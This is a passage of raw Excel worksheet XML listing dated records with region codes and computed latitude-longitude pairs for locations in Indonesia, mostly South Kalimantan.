        <v>7277</v>
      </c>
      <c r="L2700" t="s">
        <v>9132</v>
      </c>
      <c r="M2700">
        <v>5171010005</v>
      </c>
      <c r="N2700">
        <v>5171010</v>
      </c>
      <c r="O2700">
        <v>5171</v>
      </c>
      <c r="P2700">
        <v>51</v>
      </c>
      <c r="Q2700" t="s">
        <v>9133</v>
      </c>
      <c r="R2700" t="s">
        <v>9134</v>
      </c>
      <c r="S2700" t="s">
        <v>9135</v>
      </c>
      <c r="T2700" t="s">
        <v>7282</v>
      </c>
      <c r="U2700" s="5">
        <v>11523637</v>
      </c>
      <c r="V2700" s="5" t="s">
        <v>16876</v>
      </c>
      <c r="W2700" s="5">
        <v>-870395</v>
      </c>
      <c r="X2700" t="s">
        <v>20616</v>
      </c>
      <c r="Y2700" t="str">
        <f t="shared" si="42"/>
        <v>-8.70395,115.23637</v>
      </c>
    </row>
    <row r="2701" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2701">
        <v>226363</v>
      </c>
      <c r="B2701" s="1">
        <v>44211</v>
      </c>
      <c r="C2701" s="2">
        <v>0.67692129629629638</v>
      </c>
      <c r="D2701" t="s">
        <v>22</v>
      </c>
      <c r="E2701" t="s">
        <v>23</v>
      </c>
      <c r="F2701" t="s">
        <v>9136</v>
      </c>
      <c r="G2701" t="s">
        <v>9137</v>
      </c>
      <c r="H2701" t="s">
        <v>26</v>
      </c>
      <c r="I2701" t="s">
        <v>1080</v>
      </c>
      <c r="J2701" t="s">
        <v>6509</v>
      </c>
      <c r="M2701">
        <v>6371020012</v>
      </c>
      <c r="N2701">
        <v>6371020</v>
      </c>
      <c r="O2701">
        <v>6371</v>
      </c>
      <c r="P2701">
        <v>63</v>
      </c>
      <c r="Q2701" t="s">
        <v>9138</v>
      </c>
      <c r="R2701" t="s">
        <v>8795</v>
      </c>
      <c r="S2701" t="s">
        <v>6512</v>
      </c>
      <c r="T2701" t="s">
        <v>6513</v>
      </c>
      <c r="U2701" s="5">
        <v>11462323</v>
      </c>
      <c r="V2701" s="5" t="s">
        <v>16877</v>
      </c>
      <c r="W2701" s="5">
        <v>-332081</v>
      </c>
      <c r="X2701" t="s">
        <v>20617</v>
      </c>
      <c r="Y2701" t="str">
        <f t="shared" si="42"/>
        <v>-3.32081,114.62323</v>
      </c>
    </row>
    <row r="2702" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2702">
        <v>226364</v>
      </c>
      <c r="B2702" s="1">
        <v>44211</v>
      </c>
      <c r="C2702" s="2">
        <v>0.69931712962962955</v>
      </c>
      <c r="D2702" t="s">
        <v>22</v>
      </c>
      <c r="E2702" t="s">
        <v>23</v>
      </c>
      <c r="F2702" t="s">
        <v>9139</v>
      </c>
      <c r="H2702" t="s">
        <v>26</v>
      </c>
      <c r="I2702" t="s">
        <v>4228</v>
      </c>
      <c r="J2702" t="s">
        <v>6509</v>
      </c>
      <c r="L2702" t="s">
        <v>9140</v>
      </c>
      <c r="M2702">
        <v>6303040012</v>
      </c>
      <c r="N2702">
        <v>6303040</v>
      </c>
      <c r="O2702">
        <v>6303</v>
      </c>
      <c r="P2702">
        <v>63</v>
      </c>
      <c r="Q2702" t="s">
        <v>9141</v>
      </c>
      <c r="R2702" t="s">
        <v>8809</v>
      </c>
      <c r="S2702" t="s">
        <v>8751</v>
      </c>
      <c r="T2702" t="s">
        <v>6513</v>
      </c>
      <c r="U2702" s="5">
        <v>11466265</v>
      </c>
      <c r="V2702" s="5" t="s">
        <v>16878</v>
      </c>
      <c r="W2702" s="5">
        <v>-329095</v>
      </c>
      <c r="X2702" t="s">
        <v>20618</v>
      </c>
      <c r="Y2702" t="str">
        <f t="shared" si="42"/>
        <v>-3.29095,114.66265</v>
      </c>
    </row>
    <row r="2703" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2703">
        <v>226365</v>
      </c>
      <c r="B2703" s="1">
        <v>44211</v>
      </c>
      <c r="C2703" s="2">
        <v>0.71769675925925924</v>
      </c>
      <c r="D2703" t="s">
        <v>22</v>
      </c>
      <c r="E2703" t="s">
        <v>23</v>
      </c>
      <c r="F2703" t="s">
        <v>9142</v>
      </c>
      <c r="H2703" t="s">
        <v>26</v>
      </c>
      <c r="I2703" t="s">
        <v>137</v>
      </c>
      <c r="J2703" t="s">
        <v>6509</v>
      </c>
      <c r="L2703" t="s">
        <v>9143</v>
      </c>
      <c r="M2703">
        <v>6371030001</v>
      </c>
      <c r="N2703">
        <v>6371030</v>
      </c>
      <c r="O2703">
        <v>6371</v>
      </c>
      <c r="P2703">
        <v>63</v>
      </c>
      <c r="Q2703" t="s">
        <v>9144</v>
      </c>
      <c r="R2703" t="s">
        <v>8787</v>
      </c>
      <c r="S2703" t="s">
        <v>6512</v>
      </c>
      <c r="T2703" t="s">
        <v>6513</v>
      </c>
      <c r="U2703" s="5">
        <v>11457882</v>
      </c>
      <c r="V2703" s="5" t="s">
        <v>16879</v>
      </c>
      <c r="W2703" s="5">
        <v>-333698</v>
      </c>
      <c r="X2703" t="s">
        <v>20619</v>
      </c>
      <c r="Y2703" t="str">
        <f t="shared" si="42"/>
        <v>-3.33698,114.57882</v>
      </c>
    </row>
    <row r="2704" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2704">
        <v>226366</v>
      </c>
      <c r="B2704" s="1">
        <v>44211</v>
      </c>
      <c r="C2704" s="2">
        <v>0.81381944444444443</v>
      </c>
      <c r="D2704" t="s">
        <v>22</v>
      </c>
      <c r="E2704" t="s">
        <v>23</v>
      </c>
      <c r="F2704" t="s">
        <v>9145</v>
      </c>
      <c r="G2704" t="s">
        <v>9146</v>
      </c>
      <c r="H2704" t="s">
        <v>26</v>
      </c>
      <c r="I2704" t="s">
        <v>9147</v>
      </c>
      <c r="J2704" t="s">
        <v>6509</v>
      </c>
      <c r="L2704" t="s">
        <v>9148</v>
      </c>
      <c r="M2704">
        <v>6303050001</v>
      </c>
      <c r="N2704">
        <v>6303050</v>
      </c>
      <c r="O2704">
        <v>6303</v>
      </c>
      <c r="P2704">
        <v>63</v>
      </c>
      <c r="Q2704" t="s">
        <v>8767</v>
      </c>
      <c r="R2704" t="s">
        <v>8759</v>
      </c>
      <c r="S2704" t="s">
        <v>8751</v>
      </c>
      <c r="T2704" t="s">
        <v>6513</v>
      </c>
      <c r="U2704" s="5">
        <v>11484781</v>
      </c>
      <c r="V2704" s="5" t="s">
        <v>16880</v>
      </c>
      <c r="W2704" s="5">
        <v>-340547</v>
      </c>
      <c r="X2704" t="s">
        <v>20620</v>
      </c>
      <c r="Y2704" t="str">
        <f t="shared" si="42"/>
        <v>-3.40547,114.84781</v>
      </c>
    </row>
    <row r="2705" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2705">
        <v>226367</v>
      </c>
      <c r="B2705" s="1">
        <v>44211</v>
      </c>
      <c r="C2705" s="2">
        <v>0.90087962962962964</v>
      </c>
      <c r="D2705" t="s">
        <v>22</v>
      </c>
      <c r="E2705" t="s">
        <v>23</v>
      </c>
      <c r="F2705" t="s">
        <v>9149</v>
      </c>
      <c r="G2705" t="s">
        <v>9150</v>
      </c>
      <c r="H2705" t="s">
        <v>26</v>
      </c>
      <c r="I2705" t="s">
        <v>9151</v>
      </c>
      <c r="J2705" t="s">
        <v>6509</v>
      </c>
      <c r="L2705" t="s">
        <v>9152</v>
      </c>
      <c r="M2705">
        <v>6307030010</v>
      </c>
      <c r="N2705">
        <v>6307030</v>
      </c>
      <c r="O2705">
        <v>6307</v>
      </c>
      <c r="P2705">
        <v>63</v>
      </c>
      <c r="Q2705" t="s">
        <v>9153</v>
      </c>
      <c r="R2705" t="s">
        <v>9154</v>
      </c>
      <c r="S2705" t="s">
        <v>8818</v>
      </c>
      <c r="T2705" t="s">
        <v>6513</v>
      </c>
      <c r="U2705" s="5">
        <v>11545303</v>
      </c>
      <c r="V2705" s="5" t="s">
        <v>16881</v>
      </c>
      <c r="W2705" s="5">
        <v>-264174</v>
      </c>
      <c r="X2705" t="s">
        <v>20621</v>
      </c>
      <c r="Y2705" t="str">
        <f t="shared" si="42"/>
        <v>-2.64174,115.45303</v>
      </c>
    </row>
    <row r="2706" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2706">
        <v>226368</v>
      </c>
      <c r="B2706" s="1">
        <v>44211</v>
      </c>
      <c r="C2706" s="2">
        <v>0.99733796296296295</v>
      </c>
      <c r="D2706" t="s">
        <v>22</v>
      </c>
      <c r="E2706" t="s">
        <v>23</v>
      </c>
      <c r="F2706" t="s">
        <v>9155</v>
      </c>
      <c r="H2706" t="s">
        <v>26</v>
      </c>
      <c r="I2706" t="s">
        <v>92</v>
      </c>
      <c r="J2706" t="s">
        <v>6509</v>
      </c>
      <c r="L2706" t="s">
        <v>9156</v>
      </c>
      <c r="M2706">
        <v>6303050002</v>
      </c>
      <c r="N2706">
        <v>6303050</v>
      </c>
      <c r="O2706">
        <v>6303</v>
      </c>
      <c r="P2706">
        <v>63</v>
      </c>
      <c r="Q2706" t="s">
        <v>8758</v>
      </c>
      <c r="R2706" t="s">
        <v>8759</v>
      </c>
      <c r="S2706" t="s">
        <v>8751</v>
      </c>
      <c r="T2706" t="s">
        <v>6513</v>
      </c>
      <c r="U2706" s="5">
        <v>11485356</v>
      </c>
      <c r="V2706" s="5" t="s">
        <v>16882</v>
      </c>
      <c r="W2706" s="5">
        <v>-340551</v>
      </c>
      <c r="X2706" t="s">
        <v>20622</v>
      </c>
      <c r="Y2706" t="str">
        <f t="shared" si="42"/>
        <v>-3.40551,114.85356</v>
      </c>
    </row>
    <row r="2707" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2707">
        <v>226369</v>
      </c>
      <c r="B2707" s="1">
        <v>44212</v>
      </c>
      <c r="C2707" s="2">
        <v>1.1944444444444445E-2</v>
      </c>
      <c r="D2707" t="s">
        <v>22</v>
      </c>
      <c r="E2707" t="s">
        <v>23</v>
      </c>
      <c r="F2707" t="s">
        <v>9157</v>
      </c>
      <c r="G2707" t="s">
        <v>9158</v>
      </c>
      <c r="H2707" t="s">
        <v>26</v>
      </c>
      <c r="I2707" t="s">
        <v>8338</v>
      </c>
      <c r="J2707" t="s">
        <v>6509</v>
      </c>
      <c r="L2707" t="s">
        <v>9159</v>
      </c>
      <c r="M2707">
        <v>6307050007</v>
      </c>
      <c r="N2707">
        <v>6307050</v>
      </c>
      <c r="O2707">
        <v>6307</v>
      </c>
      <c r="P2707">
        <v>63</v>
      </c>
      <c r="Q2707" t="s">
        <v>8823</v>
      </c>
      <c r="R2707" t="s">
        <v>8817</v>
      </c>
      <c r="S2707" t="s">
        <v>8818</v>
      </c>
      <c r="T2707" t="s">
        <v>6513</v>
      </c>
      <c r="U2707" s="5">
        <v>11538452</v>
      </c>
      <c r="V2707" s="5" t="s">
        <v>16883</v>
      </c>
      <c r="W2707" s="5">
        <v>-258571</v>
      </c>
      <c r="X2707" t="s">
        <v>20623</v>
      </c>
      <c r="Y2707" t="str">
        <f t="shared" si="42"/>
        <v>-2.58571,115.38452</v>
      </c>
    </row>
    <row r="2708" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2708">
        <v>226370</v>
      </c>
      <c r="B2708" s="1">
        <v>44212</v>
      </c>
      <c r="C2708" s="2">
        <v>0.10366898148148147</v>
      </c>
      <c r="D2708" t="s">
        <v>22</v>
      </c>
      <c r="E2708" t="s">
        <v>23</v>
      </c>
      <c r="F2708" t="s">
        <v>9160</v>
      </c>
      <c r="H2708" t="s">
        <v>26</v>
      </c>
      <c r="I2708" t="s">
        <v>197</v>
      </c>
      <c r="J2708" t="s">
        <v>6509</v>
      </c>
      <c r="L2708" t="s">
        <v>9161</v>
      </c>
      <c r="M2708">
        <v>6311041001</v>
      </c>
      <c r="N2708">
        <v>6311041</v>
      </c>
      <c r="O2708">
        <v>6311</v>
      </c>
      <c r="P2708">
        <v>63</v>
      </c>
      <c r="Q2708" t="s">
        <v>9162</v>
      </c>
      <c r="R2708" t="s">
        <v>9163</v>
      </c>
      <c r="S2708" t="s">
        <v>8934</v>
      </c>
      <c r="T2708" t="s">
        <v>6513</v>
      </c>
      <c r="U2708" s="5">
        <v>11543936</v>
      </c>
      <c r="V2708" s="5" t="s">
        <v>16884</v>
      </c>
      <c r="W2708" s="5">
        <v>-233253</v>
      </c>
      <c r="X2708" t="s">
        <v>20624</v>
      </c>
      <c r="Y2708" t="str">
        <f t="shared" si="42"/>
        <v>-2.33253,115.43936</v>
      </c>
    </row>
    <row r="2709" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2709">
        <v>226371</v>
      </c>
      <c r="B2709" s="1">
        <v>44212</v>
      </c>
      <c r="C2709" s="2">
        <v>0.21864583333333332</v>
      </c>
      <c r="D2709" t="s">
        <v>22</v>
      </c>
      <c r="E2709" t="s">
        <v>23</v>
      </c>
      <c r="F2709" t="s">
        <v>9164</v>
      </c>
      <c r="H2709" t="s">
        <v>26</v>
      </c>
      <c r="I2709" t="s">
        <v>166</v>
      </c>
      <c r="J2709" t="s">
        <v>6509</v>
      </c>
      <c r="L2709" t="s">
        <v>9165</v>
      </c>
      <c r="M2709">
        <v>6303040001</v>
      </c>
      <c r="N2709">
        <v>6303040</v>
      </c>
      <c r="O2709">
        <v>6303</v>
      </c>
      <c r="P2709">
        <v>63</v>
      </c>
      <c r="Q2709" t="s">
        <v>8808</v>
      </c>
      <c r="R2709" t="s">
        <v>8809</v>
      </c>
      <c r="S2709" t="s">
        <v>8751</v>
      </c>
      <c r="T2709" t="s">
        <v>6513</v>
      </c>
      <c r="U2709" s="5">
        <v>11463863</v>
      </c>
      <c r="V2709" s="5" t="s">
        <v>16885</v>
      </c>
      <c r="W2709" s="5">
        <v>-331678</v>
      </c>
      <c r="X2709" t="s">
        <v>20625</v>
      </c>
      <c r="Y2709" t="str">
        <f t="shared" si="42"/>
        <v>-3.31678,114.63863</v>
      </c>
    </row>
    <row r="2710" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2710">
        <v>226372</v>
      </c>
      <c r="B2710" s="1">
        <v>44212</v>
      </c>
      <c r="C2710" s="2">
        <v>0.38716435185185188</v>
      </c>
      <c r="D2710" t="s">
        <v>22</v>
      </c>
      <c r="E2710" t="s">
        <v>23</v>
      </c>
      <c r="F2710" t="s">
        <v>9166</v>
      </c>
      <c r="G2710" t="s">
        <v>9167</v>
      </c>
      <c r="H2710" t="s">
        <v>26</v>
      </c>
      <c r="I2710" t="s">
        <v>517</v>
      </c>
      <c r="J2710" t="s">
        <v>6509</v>
      </c>
      <c r="L2710" t="s">
        <v>9168</v>
      </c>
      <c r="M2710">
        <v>6303030019</v>
      </c>
      <c r="N2710">
        <v>6303030</v>
      </c>
      <c r="O2710">
        <v>6303</v>
      </c>
      <c r="P2710">
        <v>63</v>
      </c>
      <c r="Q2710" t="s">
        <v>9169</v>
      </c>
      <c r="R2710" t="s">
        <v>9089</v>
      </c>
      <c r="S2710" t="s">
        <v>8751</v>
      </c>
      <c r="T2710" t="s">
        <v>6513</v>
      </c>
      <c r="U2710" s="5">
        <v>11466323</v>
      </c>
      <c r="V2710" s="5" t="s">
        <v>16886</v>
      </c>
      <c r="W2710" s="5">
        <v>-338090</v>
      </c>
      <c r="X2710" t="s">
        <v>20626</v>
      </c>
      <c r="Y2710" t="str">
        <f t="shared" si="42"/>
        <v>-3.38090,114.66323</v>
      </c>
    </row>
    <row r="2711" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2711">
        <v>226373</v>
      </c>
      <c r="B2711" s="1">
        <v>44212</v>
      </c>
      <c r="C2711" s="2">
        <v>0.39156250000000004</v>
      </c>
      <c r="D2711" t="s">
        <v>22</v>
      </c>
      <c r="E2711" t="s">
        <v>23</v>
      </c>
      <c r="F2711" t="s">
        <v>9170</v>
      </c>
      <c r="G2711" t="s">
        <v>9171</v>
      </c>
      <c r="H2711" t="s">
        <v>26</v>
      </c>
      <c r="I2711" t="s">
        <v>523</v>
      </c>
      <c r="J2711" t="s">
        <v>7436</v>
      </c>
      <c r="M2711">
        <v>6103030016</v>
      </c>
      <c r="N2711">
        <v>6103030</v>
      </c>
      <c r="O2711">
        <v>6103</v>
      </c>
      <c r="P2711">
        <v>61</v>
      </c>
      <c r="Q2711" t="s">
        <v>9172</v>
      </c>
      <c r="R2711" t="s">
        <v>9173</v>
      </c>
      <c r="S2711" t="s">
        <v>9174</v>
      </c>
      <c r="T2711" t="s">
        <v>7441</v>
      </c>
      <c r="U2711" s="5">
        <v>10995464</v>
      </c>
      <c r="V2711" s="5" t="s">
        <v>16887</v>
      </c>
      <c r="W2711" s="5">
        <v>38546</v>
      </c>
      <c r="X2711" t="s">
        <v>14449</v>
      </c>
      <c r="Y2711" t="str">
        <f t="shared" si="42"/>
        <v>0.38546,109.95464</v>
      </c>
    </row>
    <row r="2712" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2712">
        <v>226374</v>
      </c>
      <c r="B2712" s="1">
        <v>44212</v>
      </c>
      <c r="C2712" s="2">
        <v>0.4196064814814815</v>
      </c>
      <c r="D2712" t="s">
        <v>22</v>
      </c>
      <c r="E2712" t="s">
        <v>23</v>
      </c>
      <c r="F2712" t="s">
        <v>9175</v>
      </c>
      <c r="G2712" t="s">
        <v>9176</v>
      </c>
      <c r="H2712" t="s">
        <v>26</v>
      </c>
      <c r="I2712" t="s">
        <v>945</v>
      </c>
      <c r="J2712" t="s">
        <v>2627</v>
      </c>
      <c r="L2712" t="s">
        <v>9177</v>
      </c>
      <c r="M2712">
        <v>3273070007</v>
      </c>
      <c r="N2712">
        <v>3273070</v>
      </c>
      <c r="O2712">
        <v>3273</v>
      </c>
      <c r="P2712">
        <v>32</v>
      </c>
      <c r="Q2712" t="s">
        <v>9178</v>
      </c>
      <c r="R2712" t="s">
        <v>9179</v>
      </c>
      <c r="S2712" t="s">
        <v>1464</v>
      </c>
      <c r="T2712" t="s">
        <v>42</v>
      </c>
      <c r="U2712" s="5">
        <v>10761629</v>
      </c>
      <c r="V2712" s="5" t="s">
        <v>16888</v>
      </c>
      <c r="W2712" s="5">
        <v>-692619</v>
      </c>
      <c r="X2712" t="s">
        <v>20627</v>
      </c>
      <c r="Y2712" t="str">
        <f t="shared" si="42"/>
        <v>-6.92619,107.61629</v>
      </c>
    </row>
    <row r="2713" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2713">
        <v>226375</v>
      </c>
      <c r="B2713" s="1">
        <v>44212</v>
      </c>
      <c r="C2713" s="2">
        <v>0.49732638888888886</v>
      </c>
      <c r="D2713" t="s">
        <v>22</v>
      </c>
      <c r="E2713" t="s">
        <v>23</v>
      </c>
      <c r="F2713" t="s">
        <v>9180</v>
      </c>
      <c r="G2713" t="s">
        <v>9181</v>
      </c>
      <c r="H2713" t="s">
        <v>26</v>
      </c>
      <c r="I2713" t="s">
        <v>1604</v>
      </c>
      <c r="J2713" t="s">
        <v>2608</v>
      </c>
      <c r="L2713" t="s">
        <v>9182</v>
      </c>
      <c r="M2713">
        <v>3305120024</v>
      </c>
      <c r="N2713">
        <v>3305120</v>
      </c>
      <c r="O2713">
        <v>3305</v>
      </c>
      <c r="P2713">
        <v>33</v>
      </c>
      <c r="Q2713" t="s">
        <v>7494</v>
      </c>
      <c r="R2713" t="s">
        <v>7494</v>
      </c>
      <c r="S2713" t="s">
        <v>7494</v>
      </c>
      <c r="T2713" t="s">
        <v>1134</v>
      </c>
      <c r="U2713" s="5">
        <v>10965978</v>
      </c>
      <c r="V2713" s="5" t="s">
        <v>16889</v>
      </c>
      <c r="W2713" s="5">
        <v>-767007</v>
      </c>
      <c r="X2713" t="s">
        <v>20628</v>
      </c>
      <c r="Y2713" t="str">
        <f t="shared" si="42"/>
        <v>-7.67007,109.65978</v>
      </c>
    </row>
    <row r="2714" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2714">
        <v>226376</v>
      </c>
      <c r="B2714" s="1">
        <v>44212</v>
      </c>
      <c r="C2714" s="2">
        <v>0.52589120370370368</v>
      </c>
      <c r="D2714" t="s">
        <v>22</v>
      </c>
      <c r="E2714" t="s">
        <v>23</v>
      </c>
      <c r="F2714" t="s">
        <v>9183</v>
      </c>
      <c r="H2714" t="s">
        <v>26</v>
      </c>
      <c r="I2714" t="s">
        <v>843</v>
      </c>
      <c r="J2714" t="s">
        <v>8176</v>
      </c>
      <c r="L2714" t="s">
        <v>9184</v>
      </c>
      <c r="M2714">
        <v>7171030015</v>
      </c>
      <c r="N2714">
        <v>7171030</v>
      </c>
      <c r="O2714">
        <v>7171</v>
      </c>
      <c r="P2714">
        <v>71</v>
      </c>
      <c r="Q2714" t="s">
        <v>9185</v>
      </c>
      <c r="R2714" t="s">
        <v>9186</v>
      </c>
      <c r="S2714" t="s">
        <v>8180</v>
      </c>
      <c r="T2714" t="s">
        <v>8181</v>
      </c>
      <c r="U2714" s="5">
        <v>12484769</v>
      </c>
      <c r="V2714" s="5" t="s">
        <v>16890</v>
      </c>
      <c r="W2714" s="5">
        <v>148844</v>
      </c>
      <c r="X2714" t="s">
        <v>20629</v>
      </c>
      <c r="Y2714" t="str">
        <f t="shared" si="42"/>
        <v>1.48844,124.84769</v>
      </c>
    </row>
    <row r="2715" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2715">
        <v>226377</v>
      </c>
      <c r="B2715" s="1">
        <v>44212</v>
      </c>
      <c r="C2715" s="2">
        <v>0.59135416666666674</v>
      </c>
      <c r="D2715" t="s">
        <v>22</v>
      </c>
      <c r="E2715" t="s">
        <v>23</v>
      </c>
      <c r="F2715" t="s">
        <v>9187</v>
      </c>
      <c r="G2715" t="s">
        <v>9188</v>
      </c>
      <c r="H2715" t="s">
        <v>26</v>
      </c>
      <c r="I2715" t="s">
        <v>1651</v>
      </c>
      <c r="J2715" t="s">
        <v>6509</v>
      </c>
      <c r="L2715" t="s">
        <v>9189</v>
      </c>
      <c r="M2715">
        <v>6304060006</v>
      </c>
      <c r="N2715">
        <v>6304060</v>
      </c>
      <c r="O2715">
        <v>6304</v>
      </c>
      <c r="P2715">
        <v>63</v>
      </c>
      <c r="Q2715" t="s">
        <v>9190</v>
      </c>
      <c r="R2715" t="s">
        <v>8850</v>
      </c>
      <c r="S2715" t="s">
        <v>8851</v>
      </c>
      <c r="T2715" t="s">
        <v>6513</v>
      </c>
      <c r="U2715" s="5">
        <v>11462141</v>
      </c>
      <c r="V2715" s="5" t="s">
        <v>16891</v>
      </c>
      <c r="W2715" s="5">
        <v>-325337</v>
      </c>
      <c r="X2715" t="s">
        <v>20630</v>
      </c>
      <c r="Y2715" t="str">
        <f t="shared" si="42"/>
        <v>-3.25337,114.62141</v>
      </c>
    </row>
    <row r="2716" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2716">
        <v>226378</v>
      </c>
      <c r="B2716" s="1">
        <v>44212</v>
      </c>
      <c r="C2716" s="2">
        <v>0.59342592592592591</v>
      </c>
      <c r="D2716" t="s">
        <v>22</v>
      </c>
      <c r="E2716" t="s">
        <v>23</v>
      </c>
      <c r="F2716" t="s">
        <v>9191</v>
      </c>
      <c r="G2716" t="s">
        <v>9192</v>
      </c>
      <c r="H2716" t="s">
        <v>26</v>
      </c>
      <c r="I2716" t="s">
        <v>893</v>
      </c>
      <c r="J2716" t="s">
        <v>6509</v>
      </c>
      <c r="M2716">
        <v>6371020012</v>
      </c>
      <c r="N2716">
        <v>6371020</v>
      </c>
      <c r="O2716">
        <v>6371</v>
      </c>
      <c r="P2716">
        <v>63</v>
      </c>
      <c r="Q2716" t="s">
        <v>9138</v>
      </c>
      <c r="R2716" t="s">
        <v>8795</v>
      </c>
      <c r="S2716" t="s">
        <v>6512</v>
      </c>
      <c r="T2716" t="s">
        <v>6513</v>
      </c>
      <c r="U2716" s="5">
        <v>11461703</v>
      </c>
      <c r="V2716" s="5" t="s">
        <v>16892</v>
      </c>
      <c r="W2716" s="5">
        <v>-331443</v>
      </c>
      <c r="X2716" t="s">
        <v>20631</v>
      </c>
      <c r="Y2716" t="str">
        <f t="shared" si="42"/>
        <v>-3.31443,114.61703</v>
      </c>
    </row>
    <row r="2717" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2717">
        <v>226379</v>
      </c>
      <c r="B2717" s="1">
        <v>44212</v>
      </c>
      <c r="C2717" s="2">
        <v>0.59646990740740746</v>
      </c>
      <c r="D2717" t="s">
        <v>22</v>
      </c>
      <c r="E2717" t="s">
        <v>23</v>
      </c>
      <c r="F2717" t="s">
        <v>9193</v>
      </c>
      <c r="G2717" t="s">
        <v>9194</v>
      </c>
      <c r="H2717" t="s">
        <v>26</v>
      </c>
      <c r="I2717" t="s">
        <v>7487</v>
      </c>
      <c r="J2717" t="s">
        <v>6509</v>
      </c>
      <c r="L2717" t="s">
        <v>9195</v>
      </c>
      <c r="M2717">
        <v>6307050007</v>
      </c>
      <c r="N2717">
        <v>6307050</v>
      </c>
      <c r="O2717">
        <v>6307</v>
      </c>
      <c r="P2717">
        <v>63</v>
      </c>
      <c r="Q2717" t="s">
        <v>8823</v>
      </c>
      <c r="R2717" t="s">
        <v>8817</v>
      </c>
      <c r="S2717" t="s">
        <v>8818</v>
      </c>
      <c r="T2717" t="s">
        <v>6513</v>
      </c>
      <c r="U2717" s="5">
        <v>11538452</v>
      </c>
      <c r="V2717" s="5" t="s">
        <v>16883</v>
      </c>
      <c r="W2717" s="5">
        <v>-258553</v>
      </c>
      <c r="X2717" t="s">
        <v>20632</v>
      </c>
      <c r="Y2717" t="str">
        <f t="shared" si="42"/>
        <v>-2.58553,115.38452</v>
      </c>
    </row>
    <row r="2718" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2718">
        <v>226381</v>
      </c>
      <c r="B2718" s="1">
        <v>44212</v>
      </c>
      <c r="C2718" s="2">
        <v>0.72728009259259263</v>
      </c>
      <c r="D2718" t="s">
        <v>22</v>
      </c>
      <c r="E2718" t="s">
        <v>23</v>
      </c>
      <c r="F2718" t="s">
        <v>9196</v>
      </c>
      <c r="G2718" t="s">
        <v>9197</v>
      </c>
      <c r="H2718" t="s">
        <v>26</v>
      </c>
      <c r="I2718" t="s">
        <v>197</v>
      </c>
      <c r="J2718" t="s">
        <v>2627</v>
      </c>
      <c r="L2718" t="s">
        <v>9198</v>
      </c>
      <c r="M2718">
        <v>3273070007</v>
      </c>
      <c r="N2718">
        <v>3273070</v>
      </c>
      <c r="O2718">
        <v>3273</v>
      </c>
      <c r="P2718">
        <v>32</v>
      </c>
      <c r="Q2718" t="s">
        <v>9178</v>
      </c>
      <c r="R2718" t="s">
        <v>9179</v>
      </c>
      <c r="S2718" t="s">
        <v>1464</v>
      </c>
      <c r="T2718" t="s">
        <v>42</v>
      </c>
      <c r="U2718" s="5">
        <v>10761635</v>
      </c>
      <c r="V2718" s="5" t="s">
        <v>16893</v>
      </c>
      <c r="W2718" s="5">
        <v>-692606</v>
      </c>
      <c r="X2718" t="s">
        <v>20633</v>
      </c>
      <c r="Y2718" t="str">
        <f t="shared" si="42"/>
        <v>-6.92606,107.61635</v>
      </c>
    </row>
    <row r="2719" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2719">
        <v>226382</v>
      </c>
      <c r="B2719" s="1">
        <v>44212</v>
      </c>
      <c r="C2719" s="2">
        <v>0.86436342592592597</v>
      </c>
      <c r="D2719" t="s">
        <v>22</v>
      </c>
      <c r="E2719" t="s">
        <v>23</v>
      </c>
      <c r="F2719" t="s">
        <v>9199</v>
      </c>
      <c r="G2719" t="s">
        <v>9200</v>
      </c>
      <c r="H2719" t="s">
        <v>26</v>
      </c>
      <c r="I2719" t="s">
        <v>961</v>
      </c>
      <c r="J2719" t="s">
        <v>6509</v>
      </c>
      <c r="L2719" t="s">
        <v>9201</v>
      </c>
      <c r="M2719">
        <v>6303050002</v>
      </c>
      <c r="N2719">
        <v>6303050</v>
      </c>
      <c r="O2719">
        <v>6303</v>
      </c>
      <c r="P2719">
        <v>63</v>
      </c>
      <c r="Q2719" t="s">
        <v>8758</v>
      </c>
      <c r="R2719" t="s">
        <v>8759</v>
      </c>
      <c r="S2719" t="s">
        <v>8751</v>
      </c>
      <c r="T2719" t="s">
        <v>6513</v>
      </c>
      <c r="U2719" s="5">
        <v>11485381</v>
      </c>
      <c r="V2719" s="5" t="s">
        <v>16894</v>
      </c>
      <c r="W2719" s="5">
        <v>-340950</v>
      </c>
      <c r="X2719" t="s">
        <v>20634</v>
      </c>
      <c r="Y2719" t="str">
        <f t="shared" si="42"/>
        <v>-3.40950,114.85381</v>
      </c>
    </row>
    <row r="2720" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2720">
        <v>226383</v>
      </c>
      <c r="B2720" s="1">
        <v>44212</v>
      </c>
      <c r="C2720" s="2">
        <v>0.97144675925925927</v>
      </c>
      <c r="D2720" t="s">
        <v>22</v>
      </c>
      <c r="E2720" t="s">
        <v>23</v>
      </c>
      <c r="F2720" t="s">
        <v>9202</v>
      </c>
      <c r="G2720" t="s">
        <v>9203</v>
      </c>
      <c r="H2720" t="s">
        <v>26</v>
      </c>
      <c r="I2720" t="s">
        <v>137</v>
      </c>
      <c r="J2720" t="s">
        <v>6509</v>
      </c>
      <c r="L2720" t="s">
        <v>9204</v>
      </c>
      <c r="M2720">
        <v>6371010005</v>
      </c>
      <c r="N2720">
        <v>6371010</v>
      </c>
      <c r="O2720">
        <v>6371</v>
      </c>
      <c r="P2720">
        <v>63</v>
      </c>
      <c r="Q2720" t="s">
        <v>9205</v>
      </c>
      <c r="R2720" t="s">
        <v>6511</v>
      </c>
      <c r="S2720" t="s">
        <v>6512</v>
      </c>
      <c r="T2720" t="s">
        <v>6513</v>
      </c>
      <c r="U2720" s="5">
        <v>11460858</v>
      </c>
      <c r="V2720" s="5" t="s">
